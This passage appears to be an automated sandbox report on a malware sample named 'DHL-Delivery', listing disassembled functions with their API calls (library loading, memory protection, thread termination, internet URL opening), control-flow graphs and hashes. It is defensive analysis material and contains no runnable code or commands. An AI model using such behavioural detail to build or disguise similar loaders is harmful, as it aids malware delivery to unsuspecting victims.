                        Uniqueness Score: 0.02%

                        Function 1E120680, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 90df6622f605e901073f6c29c180faef2d1c34fc08776bed8a4f4ed2146ccc7f
                        • Instruction ID: a894ed535249b09231e4bf4e679705692ab56ad2b53a829de1a4f1ea641e4f96
                        • Opcode Fuzzy Hash: 90df6622f605e901073f6c29c180faef2d1c34fc08776bed8a4f4ed2146ccc7f
                        • Instruction Fuzzy Hash: 4290023A24108807D120615D940479E100947D0713FA9C511A4425618D869588D57161
                        Uniqueness

                        Uniqueness Score: 0.02%

                        Function 1E1206B0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 3b0a37847d074a269bf758e915359b2cc5f1cd53828f97b41a9ef0fef2231c9a
                        • Instruction ID: 69a5da3a89eb18a3d657fd1d35816f16b03836cbcbdb8e1f18cdfde25065868c
                        • Opcode Fuzzy Hash: 3b0a37847d074a269bf758e915359b2cc5f1cd53828f97b41a9ef0fef2231c9a
                        • Instruction Fuzzy Hash: 9B90023A24100407D110659D640869A100947E0713FA5D111A5025515EC66588D56171
                        Uniqueness

                        Uniqueness Score: 0.02%

                        Function 1E120720, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 7dba8186d2aba947f89e875f8145f3703088821c950d08d7902a8a25d55a02f1
                        • Instruction ID: e75f3ecd856ed6c415a6075118dc010d52c8868ff06c6ad345bb036053c2f672
                        • Opcode Fuzzy Hash: 7dba8186d2aba947f89e875f8145f3703088821c950d08d7902a8a25d55a02f1
                        • Instruction Fuzzy Hash: DF90022E25300007D190715D640865E100947D1713FE5D515A0016518CC91588ED5361
                        Uniqueness

                        Uniqueness Score: 0.02%

                        Function 1E120740, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: b194059654ab44c23a86ee9367c1684023956a0dcbc25db4326d363ef585f9b8
                        • Instruction ID: 04a4251f8d7ff1996f7310e72fec3baa8a25ff2082c446e623c4ef27b5c95e24
                        • Opcode Fuzzy Hash: b194059654ab44c23a86ee9367c1684023956a0dcbc25db4326d363ef585f9b8
                        • Instruction Fuzzy Hash: 7A90022A34100007D150715D641865A500997E1713FA5D111E0415514CD91588DA5262
                        Uniqueness

                        Uniqueness Score: 0.02%

                        Function 1E1207E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 08f26f48dbb16dc20b223ac46ebf2d3aa5ef2096416e4e936830878530114876
                        • Instruction ID: 1025aa6fff8deb0242ff3b73116e6cfc63a8b885cb3b56333a3b8f77bc4071b0
                        • Opcode Fuzzy Hash: 08f26f48dbb16dc20b223ac46ebf2d3aa5ef2096416e4e936830878530114876
                        • Instruction Fuzzy Hash: 6490022A282041575555B15D540455B500A57E07537E5C112A1415910C852698DAD661
                        Uniqueness

                        Uniqueness Score: 0.02%

                        Function 1E1204E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: a217aa7b4180e7db7142aa3c29628684af018557db481fc42a355815fe766ab6
                        • Instruction ID: e1ca78f958900dc8283c0eebc1d2db18ed67be269cc8dd6ef25ab0879bc5a3cb
                        • Opcode Fuzzy Hash: a217aa7b4180e7db7142aa3c29628684af018557db481fc42a355815fe766ab6
                        • Instruction Fuzzy Hash: 4F90022E251000070115A55D170455B104A47D57633A5C121F1016510CD62188E55161
                        Uniqueness

                        Uniqueness Score: 0.02%

                        Function 1E120570, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 7f01833a8adca7e22e271a643d4ac78618b5a9f7e96bb6649fe3abe3c88e868b
                        • Instruction ID: 88913c034e15c1f9a5b168c4f5746eb42ea4201e6c1a9901d9105e90a981dad5
                        • Opcode Fuzzy Hash: 7f01833a8adca7e22e271a643d4ac78618b5a9f7e96bb6649fe3abe3c88e868b
                        • Instruction Fuzzy Hash: 1190026A242000074115715D541466A500E47E0713BA5C121E1015550DC52588D56165
                        Uniqueness

                        Uniqueness Score: 0.02%

                        Function 00564004, Relevance: 9.3, APIs: 1, Strings: 4, Instructions: 564libraryUNIQUE
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: .$6*$h$m
                        • API String ID: 1029625771-1073823525
                        • Opcode ID: 60042f3c301f062e78e61212a268bf8d2d170c8bdab0abd86ed5e2e6f4559df4
                        • Instruction ID: 9e4b609dc1e2b084b5ae62fc5ec268f2650bd902de725c48307ad9346baf4720
                        • Opcode Fuzzy Hash: 60042f3c301f062e78e61212a268bf8d2d170c8bdab0abd86ed5e2e6f4559df4
                        • Instruction Fuzzy Hash: 95F16B7078030BAEFF302D248CA57FA2A67BF52790FE44515EDC6571C5DB7A88C99A02
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 00569AFD, Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 497UNIQUE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 132 569afd-569ca0 call 5683ac * 2 call 564d72 GetPEB call 56a407 147 569ca6-569db3 132->147 148 56a0da-56a0dc 132->148 154 5683ac-5683e1 147->154 155 569db9-569e3b 147->155 158 5683e7-568420 call 568b71 154->158 159 5684db-56851c LoadLibraryA call 56854d 154->159 163 569e3f-569e47 155->163 172 568422-568449 call 568b71 158->172 173 568490-5684da call 56854d 158->173 166 56a0e1-56a122 163->166 167 569e4d-569e70 163->167 175 56a126-56a14d 166->175 167->163 174 569e72-569e78 167->174 172->173 187 56844b-56848e call 568b71 172->187 173->159 174->163 177 569e7a-569e81 174->177 183 56a293-56a2c5 175->183 184 56a153-56a159 175->184 177->163 182 569e83-569ea6 177->182 193 569eac-569eed 182->193 194 564cf9-564d1f 182->194 191 56a2c9-56a2cf 183->191 184->175 189 56a15b-56a161 184->189 187->173 189->175 190 56a163-56a18c 189->190 190->175 201 56a18e-56a1ae 190->201 197 56a2d5-56a2fb 191->197 198 56a3a1-56a3cf call 56a407 191->198 206 569eef-569eff 193->206 202 564d20-564d5c 194->202 197->191 210 56a2fd-56a304 197->210 201->154 207 56a1b4-56a1d8 201->207 218 564d5e-5667d0 call 564c0a 202->218 211 569f01-569f4a 206->211 212 569f6f-569f77 206->212 224 56a1da-56a1e0 207->224 210->191 213 56a306-56a310 210->213 215 569fa2-569fa7 211->215 212->215 216 569f79-569fa1 212->216 213->191 220 56a312-56a35f 213->220 222 56a04c-56a054 215->222 223 569fad-569fb4 215->223 216->215 242 56a361-56a367 220->242 231 56a056-56a05f 222->231 232 56a09b-56a0a1 222->232 223->222 227 569fba-569feb 223->227 228 56a254-56a25a 224->228 229 56a1e2-56a1ea 224->229 244 569fed-569ff4 227->244 228->224 239 56a260-56a28b call 56a407 228->239 237 56a215-56a227 229->237 238 56a1ec-56a210 229->238 231->232 233 56a061-56a098 231->233 232->206 235 56a0a7-56a0d4 call 56a407 232->235 233->232 235->148 237->228 253 56a246-56a253 238->253 254 56a212 238->254 249 56a399-56a39f 242->249 250 56a369-56a398 242->250 244->244 252 569ff6-56a01b 244->252 249->198 249->242 250->249 252->244 261 56a01d-56a023 252->261 253->228 254->237 261->244 262 56a025-56a04a 261->262 262->222
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadMemoryProtectVirtual
                        • String ID: "Bp0$"Bp0$GT`$nTAz
                        • API String ID: 3389902171-2115530794
                        • Opcode ID: eb13fd6ebfbcc1ed56fec3004cd83834b5bf6e560f8ef851a6fa1d9123e8993a
                        • Instruction ID: b54b305a07e155b81527ac61a40e9a0e4e536697f896e0411fd0f831a27bb5da
                        • Opcode Fuzzy Hash: eb13fd6ebfbcc1ed56fec3004cd83834b5bf6e560f8ef851a6fa1d9123e8993a
                        • Instruction Fuzzy Hash: 48E16064B44342DEDF309A3489A47E67F96BF63360F94865ECC928B1C6D7358886CB13
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 00565862, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 196networkUNIQUE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 264 565862-5658d6 InternetOpenA 267 565d1c-565d4b 264->267 268 5658dc-5659c4 call 56ab16 call 56599d 264->268 268->267 279 5659ca-565a79 InternetOpenUrlA 268->279 279->267 283 565a7f-565ae9 279->283 286 565aec-565b7c call 565b10 283->286 292 565bae-565bfa call 56ab16 286->292 293 565b7e-565ba8 286->293 292->267 298 565c00-565c23 292->298 293->292 299 565c25-565c53 298->299 300 565c5d-565d13 call 56ab16 * 2 298->300 299->286
                        APIs
                        • InternetOpenA.WININET(005664E8,00000000,00000000,00000000,00000000,0056676B), ref: 005658A8
                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00565A6B
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InternetOpen
                        • String ID: -+BC
                        • API String ID: 2038078732-1788755027
                        • Opcode ID: f6980cff25612a014d5b4a6b0b25d98c87c5414345769d9797871ac34beaec89
                        • Instruction ID: b91f53186d0f4fb8a0e06073df05f1b48839d65038f8257f9209cc40e5c06441
                        • Opcode Fuzzy Hash: f6980cff25612a014d5b4a6b0b25d98c87c5414345769d9797871ac34beaec89
                        • Instruction Fuzzy Hash: 0B510930284B4B9AFB305D18CDA5BEF2BAABF41790FA48525ED4757190F3728984D611
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 00565870, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163networkUNIQUE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 309 565870-5658d6 InternetOpenA 312 565d1c-565d4b 309->312 313 5658dc-5659c4 call 56ab16 call 56599d 309->313 313->312 324 5659ca-565a79 InternetOpenUrlA 313->324 324->312 328 565a7f-565ae9 324->328 331 565aec-565b7c call 565b10 328->331 337 565bae-565bfa call 56ab16 331->337 338 565b7e-565ba8 331->338 337->312 343 565c00-565c23 337->343 338->337 344 565c25-565c53 343->344 345 565c5d-565d13 call 56ab16 * 2 343->345 344->331
                        APIs
                        • InternetOpenA.WININET(005664E8,00000000,00000000,00000000,00000000,0056676B), ref: 005658A8
                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00565A6B
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InternetOpen
                        • String ID: -+BC
                        • API String ID: 2038078732-1788755027
                        • Opcode ID: e0d7850dbcb91d6bd28f8d45dd82d02503fc5b87e5f41514bf714746c3b6d5a9
                        • Instruction ID: 899600af4e6d84216eaa19ad422ec0251df39ae3488d1e3624656ea59fe7ceb2
                        • Opcode Fuzzy Hash: e0d7850dbcb91d6bd28f8d45dd82d02503fc5b87e5f41514bf714746c3b6d5a9
                        • Instruction Fuzzy Hash: FF513830384B4B9AFB304D64CEA57EF2BAABF41790FA04625ED0797190F7728984D621
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 00565982, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 155networkUNIQUE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 354 565982-56598e 355 5659d7-5659ee 354->355 356 565990-565999 354->356 359 5659f0-565a79 InternetOpenUrlA 355->359 357 565955-56596f 356->357 358 56599b-5659b8 356->358 364 565974-56597f call 56ab16 357->364 358->364 365 5659ba 358->365 366 565a7f-565ae9 359->366 367 565d1c-565d4b 359->367 369 5659bc-5659c4 call 56599d 364->369 365->369 376 565aec-565b7c call 565b10 366->376 369->367 378 5659ca-5659ce 369->378 384 565bae-565bfa call 56ab16 376->384 385 565b7e-565ba8 376->385 378->359 384->367 390 565c00-565c23 384->390 385->384 391 565c25-565c53 390->391 392 565c5d-565d13 call 56ab16 * 2 390->392 391->376
                        APIs
                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00565A6B
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InternetOpen
                        • String ID: -+BC
                        • API String ID: 2038078732-1788755027
                        • Opcode ID: 100f575293a828b9ab96ee2a77a4aa51f89666b2d7f67dd92a45606044d8d197
                        • Instruction ID: deeee6ec478c827168773839f5989696b111433180105696b34806e3b0c96471
                        • Opcode Fuzzy Hash: 100f575293a828b9ab96ee2a77a4aa51f89666b2d7f67dd92a45606044d8d197
                        • Instruction Fuzzy Hash: 87416C303C4B8BDBE7304E68C9957EF3BA6BF427A0F508625EC069B151F7728545DA22
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 005658B5, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 147networkUNIQUE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 401 5658b5-5658d6 402 565d1c-565d4b 401->402 403 5658dc-5659c4 call 56ab16 call 56599d 401->403 403->402 414 5659ca-565a79 InternetOpenUrlA 403->414 414->402 418 565a7f-565ae9 414->418 421 565aec-565b7c call 565b10 418->421 427 565bae-565bfa call 56ab16 421->427 428 565b7e-565ba8 421->428 427->402 433 565c00-565c23 427->433 428->427 434 565c25-565c53 433->434 435 565c5d-565d13 call 56ab16 * 2 433->435 434->421
                        APIs
                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00565A6B
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InternetOpen
                        • String ID: -+BC
                        • API String ID: 2038078732-1788755027
                        • Opcode ID: 4e39367baf41b32911f68abaafe60e9b837de7e13719f30710aacd4683bd0c3f
                        • Instruction ID: 736fab16edcffa39726409dd089ec2a5814e94928cf4b0c237a66b233f080c27
                        • Opcode Fuzzy Hash: 4e39367baf41b32911f68abaafe60e9b837de7e13719f30710aacd4683bd0c3f
                        • Instruction Fuzzy Hash: 3E412630384B4B9AFB304D64CEA57FF2BAABF41390F944625ED0797191F3728984D622
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 0056399C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 136threadUNIQUE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 444 56399c-5639c5 446 5639c7-5639d9 444->446 446->446 447 5639db-563a38 TerminateThread 446->447 450 563a3e-565062 call 563a96 447->450 451 5683ac-5683e1 447->451 473 565212-565222 450->473 474 565068-565092 450->474 454 5683e7-568420 call 568b71 451->454 455 5684db-56851c LoadLibraryA call 56854d 451->455 467 568422-568449 call 568b71 454->467 468 568490-5684da call 56854d 454->468 467->468 478 56844b-56848e call 568b71 467->478 468->455 474->473 479 565098-5650dc call 564cf9 call 564d72 474->479 478->468 479->473 488 5650e2-5650ed 479->488 488->473 489 5650f3-5651e3 488->489 495 564cf9-564d1f 489->495 496 5651e9-56520b 489->496 499 564d20-564d5c 495->499 501 564d5e-5667d0 call 564c0a 499->501
                        APIs
                        • TerminateThread.KERNELBASE(000000FE,00000000), ref: 00563A28
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: TerminateThread
                        • String ID: e
                        • API String ID: 1852365436-4024072794
                        • Opcode ID: 9be54757be155f8c3ab5ec257e4edf1e388714bb6448ca2f3312e0aa453ac05f
                        • Instruction ID: 06e593f48d917ccacde9182699167c37a4bfc54be9e96b7be359c4c981dc9575
                        • Opcode Fuzzy Hash: 9be54757be155f8c3ab5ec257e4edf1e388714bb6448ca2f3312e0aa453ac05f
                        • Instruction Fuzzy Hash: A131C3B1A957079EEF31495489687D63793BF177F0FA50201EC92472D5F321C883D512
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 00565905, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132networkUNIQUE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 508 565905-5659c4 call 56ab16 call 56599d 517 565d1c-565d4b 508->517 518 5659ca-565a79 InternetOpenUrlA 508->518 518->517 524 565a7f-565ae9 518->524 527 565aec-565b7c call 565b10 524->527 533 565bae-565bfa call 56ab16 527->533 534 565b7e-565ba8 527->534 533->517 539 565c00-565c23 533->539 534->533 540 565c25-565c53 539->540 541 565c5d-565d13 call 56ab16 * 2 539->541 540->527
                        APIs
                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00565A6B
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InternetOpen
                        • String ID: -+BC
                        • API String ID: 2038078732-1788755027
                        • Opcode ID: 930ed9aedf0438d674fddcbadd51ac5d61c3c2bbeee8e6b2f568e8215f5fc0ab
                        • Instruction ID: ef285ce68410c89ed482bb2f4c0797608304d39409e85ae3659f5d7b59459d40
                        • Opcode Fuzzy Hash: 930ed9aedf0438d674fddcbadd51ac5d61c3c2bbeee8e6b2f568e8215f5fc0ab
                        • Instruction Fuzzy Hash: 94411730284B4BDAEB304D64CEA5BEF2BAABF41390F544625ED0797190F3728985D621
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 00563994, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 124threadUNIQUE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 550 563994-5639c5 552 5639c7-5639d9 550->552 552->552 553 5639db-563a38 TerminateThread 552->553 556 563a3e-565062 call 563a96 553->556 557 5683ac-5683e1 553->557 579 565212-565222 556->579 580 565068-565092 556->580 560 5683e7-568420 call 568b71 557->560 561 5684db-56851c LoadLibraryA call 56854d 557->561 573 568422-568449 call 568b71 560->573 574 568490-5684da call 56854d 560->574 573->574 584 56844b-56848e call 568b71 573->584 574->561 580->579 585 565098-5650dc call 564cf9 call 564d72 580->585 584->574 585->579 594 5650e2-5650ed 585->594 594->579 595 5650f3-5651e3 594->595 601 564cf9-564d1f 595->601 602 5651e9-56520b 595->602 605 564d20-564d5c 601->605 607 564d5e-5667d0 call 564c0a 605->607
                        APIs
                        • TerminateThread.KERNELBASE(000000FE,00000000), ref: 00563A28
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: TerminateThread
                        • String ID: e
                        • API String ID: 1852365436-4024072794
                        • Opcode ID: cd657e3962b975226fec7cd8aadff2015373645a53e41b65ef865d3ae9638282
                        • Instruction ID: 29e8eba8e7f57086ea3a2debd0668c071bf3e94411856b521fd43fa399feb716
                        • Opcode Fuzzy Hash: cd657e3962b975226fec7cd8aadff2015373645a53e41b65ef865d3ae9638282
                        • Instruction Fuzzy Hash: 1131C2B1A84706AEEF30491889687D63B92BF573F0FB50201EC934B2D6F361C8C29612
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 0056594B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 118networkUNIQUE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 614 56594b-5659c4 call 56ab16 call 56599d 621 565d1c-565d4b 614->621 622 5659ca-565a79 InternetOpenUrlA 614->622 622->621 628 565a7f-565ae9 622->628 631 565aec-565b7c call 565b10 628->631 637 565bae-565bfa call 56ab16 631->637 638 565b7e-565ba8 631->638 637->621 643 565c00-565c23 637->643 638->637 644 565c25-565c53 643->644 645 565c5d-565d13 call 56ab16 * 2 643->645 644->631
                        APIs
                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00565A6B
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InternetOpen
                        • String ID: -+BC
                        • API String ID: 2038078732-1788755027
                        • Opcode ID: 00fda33d2ccb91779967d904f6ef70d71b88e99f7889320af4e7302ad591ed2a
                        • Instruction ID: 8415d35932487add1b0afdf9650c4782065da68142e48efcb69af0e26c35983c
                        • Opcode Fuzzy Hash: 00fda33d2ccb91779967d904f6ef70d71b88e99f7889320af4e7302ad591ed2a
                        • Instruction Fuzzy Hash: 7531F73038474B9AEB304D688995BEE2BAABF41380F504625EC0797190F7728984D622
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 005659D0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 108networkUNIQUE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 654 5659d0-565a79 InternetOpenUrlA 658 565a7f-565ae9 654->658 659 565d1c-565d4b 654->659 663 565aec-565b7c call 565b10 658->663 670 565bae-565bfa call 56ab16 663->670 671 565b7e-565ba8 663->671 670->659 676 565c00-565c23 670->676 671->670 677 565c25-565c53 676->677 678 565c5d-565d13 call 56ab16 * 2 676->678 677->663
                        APIs
                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00565A6B
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InternetOpen
                        • String ID: -+BC
                        • API String ID: 2038078732-1788755027
                        • Opcode ID: 03b0f451d0c43469a4393b9955e5846955aab3fe661fb3daf413a9e4e63f56cb
                        • Instruction ID: 518c649bb5f483e7ba0f2f2a82b5fbd962a213f80f8fbc2bc10dc828e3c6a1f2
                        • Opcode Fuzzy Hash: 03b0f451d0c43469a4393b9955e5846955aab3fe661fb3daf413a9e4e63f56cb
                        • Instruction Fuzzy Hash: E131EA703C474B9AE7308D68C9A57EF2BA7BF41780F504625EC0797190F3728945D622
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 00565A12, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 90networkUNIQUE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 687 565a12-565a79 InternetOpenUrlA 690 565a7f-565ae9 687->690 691 565d1c-565d4b 687->691 695 565aec-565b7c call 565b10 690->695 702 565bae-565bfa call 56ab16 695->702 703 565b7e-565ba8 695->703 702->691 708 565c00-565c23 702->708 703->702 709 565c25-565c53 708->709 710 565c5d-565d13 call 56ab16 * 2 708->710 709->695
                        APIs
                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00565A6B
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InternetOpen
                        • String ID: -+BC
                        • API String ID: 2038078732-1788755027
                        • Opcode ID: 42dd494e32318d1af3f60f1457ef673a35b64e7abcecf3df0bf6e5b1f02b6307
                        • Instruction ID: 5b38640c5e4e77b67f463f8f113bed7dee6947b057bedba0285ef4c54a7628f5
                        • Opcode Fuzzy Hash: 42dd494e32318d1af3f60f1457ef673a35b64e7abcecf3df0bf6e5b1f02b6307
                        • Instruction Fuzzy Hash: D621F8702C474BDBEB308D68CAA57EF2BAABF41380F548525EC0797550F732C945DA22
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 00565A48, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 89networkUNIQUE
                        Download Yara Rule

                        Control-flow Graph
